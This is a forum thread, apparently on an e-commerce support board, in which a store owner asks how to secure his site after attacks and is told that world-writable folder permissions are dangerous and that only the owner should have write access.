Yes, this is possibly the reason. Without looking at the server logs it's difficult to say exactly. But if you do everything you can to secure the site, then it's less likely that anyone can get in.

 

Will you guide me please.

 

Guide you with what part? Editing the file? File permissions? Tell us specifically what you need help with and someone will try to help you.

Posted
Guide you with what part? Editing the file? File permissions? Tell us specifically what you need help with and someone will try to help you.

 

Please look at the snapshot.

 

permissions.gif

 

This is the preview of my admin folder attributes; similarly, some folders are set to 750, some to 757.

 

A few days ago I corrected the file permissions to 644, and now it seems that there are no more attacks. I am afraid to change too many things in my company's store.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted
Please look at the snapshot.

 

This is the preview of my admin folder attributes; similarly, some folders are set to 750, some to 757.

 

A few days ago I corrected the file permissions to 644, and now it seems that there are no more attacks. I am afraid to change too many things in my company's store.

 

According to that snapshot, everyone in the world has write permissions to your file. This is bad. Very bad! Only the owner should have write permissions, no one else.
